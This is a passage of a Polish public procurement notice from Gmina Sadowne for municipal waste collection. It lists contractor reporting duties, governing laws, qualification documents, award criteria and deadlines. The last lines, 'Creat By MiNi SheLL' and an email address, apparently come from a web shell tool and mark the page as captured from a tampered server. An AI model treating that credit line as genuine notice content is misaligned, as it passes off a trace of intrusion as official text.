zmieszanych odpadów komunalnych o kodzie 19 12 12, przekazanych do składowania,
l.przebiegu pracy na terenie gminy z systemu GPS zamontowanego w pojeździe przeznaczonym do zbierania odpadów komunalnych.
2. Raporty, o których mowa muszą być przekazane w formie papierowej oraz
elektronicznej uzgodnionej z Zamawiającym.
3. Raport miesięczny potwierdzający prawidłowe wykonanie umowy w okresie raportowanym jest podstawą do wystawienie faktury za wykonaną usługę.
4. Wykonawca jest zobowiązany do niezwłocznego przekazywania Zamawiającemu raportów zawierających informacje  o ilości i frakcji odebranych odpadów w ramach tzw. mobilnego punktu selektywnej zbiórki.
3.6.2. Informacje wymagane od Wykonawcy.
1) Wykonawca jest zobowiązany do niezwłocznego przekazania Zamawiającemu informacji 
o niezgodnym z Regulaminem utrzymania czystości i porządku na terenie Gminy Sadowne gromadzeniu odpadów, w szczególności ich mieszaniu lub przygotowaniu do odbierania 
w niewłaściwych workach/pojemnikach. Informacja powinna zawierać w szczególności:
a) adres nieruchomości, na której odpady gromadzone są w sposób niezgodny z Regulaminem utrzymania czystości i porządku ma terenie Gminy Sadowne,
b) zdjęcia w postaci papierowej oraz cyfrowej dowodzące, że odpady gromadzone 
są w sposób niewłaściwy;
c) dane pracowników wykonawcy, którzy stwierdzili fakt niezgodnego z Regulaminem postępowania z odpadami komunalnymi oraz ewentualne oświadczenie przez nich przekazane.
2) Wykonawca jest zobowiązany do bieżącego przekazywania adresów nieruchomości, na których zamieszkują mieszkańcy, na których powstają odpady, a nieujętych w bazie danych prowadzonej przez Zamawiającego.
3) Informacje, o których mowa w ust. 1 i 2 Wykonawca przekazuje Zamawiającemu 
w postaci papierowej lub elektronicznej.
3.6.3. Informacja dodatkowe.
Na wykonawcy zamówienia ciążą obowiązki wynikające z przepisów ustawy z dnia 
13 września 1996 r. o utrzymaniu czystości i porządku w gminach, w szczególności Wykonawca zobowiązany jest do spełnienia wymagań określonych w art. 9d ustawy oraz wymagań wynikających z Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122).
3.7. Przepisy prawa powszechnego obowiązującego mające wpływ na wykonanie
przedmiotu zamówienia.
Przedmiot zamówienia należy realizować zgodnie z wymaganiami określonymi w:
1.	Dyrektywie Parlamentu Europejskiego i Rady 2008/98/WE z dnia 19 listopada
2008r. w sprawie odpadów oraz uchylającej niektóre dyrektywy (Dz. U. UE. L
2008.312.3),
2.	Ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach
(tekst. Jednolity: Dz. U. z 2013 r. poz. 1399 ze zm.),
3.	Ustawie z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r, poz.21 ze zm.);
4.	Rozporządzeniu Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów
sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach
ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi
(Dz. U. z 2012 poz.630),
5.	Rozporządzeniu Ministra Środowiska z dnia 11 września 2012r. w sprawie
mechaniczno-biologicznego przetwarzania zmieszanych odpadów komunalnych
(Dz. U. z 2012 poz.1052),
6.	Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012r. w sprawie
poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi
metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 poz.645),
7.	Rozporządzeniu Ministra Środowiska z dnia 25 maja 2012r. w sprawie
poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji
przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia
masy tych odpadów (Dz. U. z 2012 poz. 676),
8.	Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie
szczegółowych wymagań w zakresie odbierania odpadów komunalnych od
właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122),
9.	Wojewódzkim Planie Gospodarki Odpadami dla Mazowsza na lata 2012 - 2017
z uwzględnieniem lat 2018 - 2023 przyjętym uchwałą Sejmiku Województwa
Mazowieckiego nr 211.12 z dnia 22.10.2012 r.
10.	Uchwale Nr 212.12 z dnia 22.10.2012 r. w sprawie wykonania Wojewódzkiego
Planu Gospodarki Odpadami dla Mazowsza na lata 2012 - 2017 z
uwzględnieniem lat 2018 - 2023,
11.	Uchwale Nr XXII.151.2013 RADY GMINY SADOWNE z dnia 23 stycznia 2013 r.
 w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Sadowne    (DZ. URZ. WOJ. Mazowieckiego Poz. 2680 z dnia 04.03.2013 r.),
12.	Uchwale Nr XXVI.173.2013 RADY GMINY SADOWNE z dnia 28 maja 2013 r. w sprawie zmiany uchwały Nr XXII.151.2013 RADY GMINY SADOWNE z dnia 23 stycznia 2013 r. w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Sadowne (DZ. URZ. WOJ. Mazowieckiego Poz. 6671 z dnia 14.06.2013 r.),
13.Uchwale Nr XXVI.174.2013 RADY GMINY SADOWNE z dnia 28 maja 2013 r. w sprawie w sprawie określenie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi,
14.Ustawie z dnia 29 sierpnia 1991 r. o ochronie danych osobowych (tekst jednolity: Dz. U.2014 poz.1182 ze zm.)
15.Ustawie z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2013 r.,  poz. 907 z późn. zm.)
16.Innych aktach normatywnych obowiązujących na obszarze Gminy Sadowne..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 Ustawy</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedstawi:
- zaświadczenie o wpisie do ewidencji działalności regulowanych prowadzonej przez Wójta Gminy Sadowne dotyczącej podmiotów uprawnionych do prowadzenia działalności gospodarczej w zakresie odbioru odpadów komunalnych z obszaru Gminy Sadowne w zakresie odpadów objętych przedmiotem zamówienia,
- zezwolenie na transport odpadów, o którym mowa w art. 41 ustawy z dnia 27 kwietnia 
2001 r. o odpadach (Dz. U. z 2013 r.,  poz. 21 ze zm.) w zakresie objętym przedmiotem zamówienia lub wpis do rejestru, o którym mowa w art. 50 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 ze zm.) w zakresie transportu odpadów objętych przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedstawi wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, tj. minimum 2 usługi polegające na odbiorze odpadów komunalnych o wartości 200.000,00 zł brutto każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje sprzętem koniecznym do prawidłowego wykonania zamówienia to jest minimum:

Lp.	Rodzaj pojazdów	Wymagana ilość pojazdów
1.	Pojazd bezpylny z funkcją kompaktującą	1 szt.
2.	Pojazdy przystosowane do odbierania
selektywnie zebranych odpadów komunalnych	2 szt.
Pojazdy do odbierania odpadów komunalnych zmieszanych powinny spełniać
wymagania Dyrektywy 98/69/EC - norm Euro 3.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- zezwolenie na transport odpadów, o którym mowa w art. 28 ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz. U. z 2001 r., Nr 62, poz. 628) w zakresie objętym przedmiotem zamówienia lub wpis do rejestru, o którym mowa w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21) w zakresie transportu odpadów objętych przedmiotem zamówienia (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne spełnienie warunku)
- zaświadczenie o wpisie do ewidencji działalności regulowanych prowadzonej przez Wójta Gminy Sadowne dotyczącej podmiotów uprawnionych do prowadzenia działalności gospodarczej w zakresie odbioru odpadów komunalnych z obszaru Gminy Sadowne w zakresie odpadów objętych przedmiotem zamówienia (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne spełnienie warunku</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) w części dotyczącej przedmiotu Umowy oraz sposobu wykonywania Umowy: 
a) w zakresie częstotliwości odbioru odpadów komunalnych, w przypadku gdy: 
- wskazana w SIWZ częstotliwość odbioru poszczególnych rodzajów odpadów komunalnych jest nieadekwatna (zbyt niska lub zbyt wysoka) do bieżących potrzeb, dopuszczalna jest zmiana częstotliwości odbioru w zakresie zapewniającym ich prawidłowy odbiór; 
- zmianie ulegną dni wolne od pracy, w tym dni świąteczne w rozumieniu przepisów ustawy 
z dnia 18 stycznia 1951 r. o dniach wolnych od pracy (Dz. U. Nr 4, poz. 28, z późn. zm.), dopuszczalne jest dostosowanie częstotliwości odbioru odpadów komunalnych do zmienionych przepisów ww. ustawy; 
b) w zakresie pojazdów wykorzystywanych przez Wykonawcę do odbioru i transportu poszczególnych rodzajów odpadów komunalnych, w przypadku gdy wskazane w Ofercie:
- pojazdy nie będą mogły być wykorzystywane do realizacji Umowy, dopuszczalna jest zmiana pojazdu na spełniający wymagania wskazane w SIWZ oraz posiadający parametry co najmniej takie jak zadeklarowane przez Wykonawcę w Ofercie (jeżeli deklaracja Wykonawcy odnosiła się do zastępowanego pojazdu), 
c) w zakresie raportowania, kontroli i zarządzania wymaganą jakością świadczonych usług dopuszcza się zmianę sposobu i terminów przekazywania raportów oraz zakresu informacji znajdujących się w przekazywanych Zamawiającemu raportach, jeżeli w ich konsekwencji nie zostają obniżone zasady świadczenia określone przez Zamawiającego w SIWZ, 
2) w przypadku zmiany przepisów prawa w zakresie mającym wpływ na realizację Umowy. 
3) Zmiany, o których mowa w ust. 1, nie mogą skutkować wykroczeniem poza określenie przedmiotu zamówienia zawartego w SIWZ, jak również nie mogą spowodować zwiększenia Wynagrodzenia Wykonawcy wynikającego z Oferty</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sadowne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sadowne
ul. Kościuszki 3
07-140 Sadowne
Pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2015 godzina 10:00, miejsce: Urząd Gminy Sadowne
ul. Kościuszki 3
07-140 Sadowne
Pokój nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com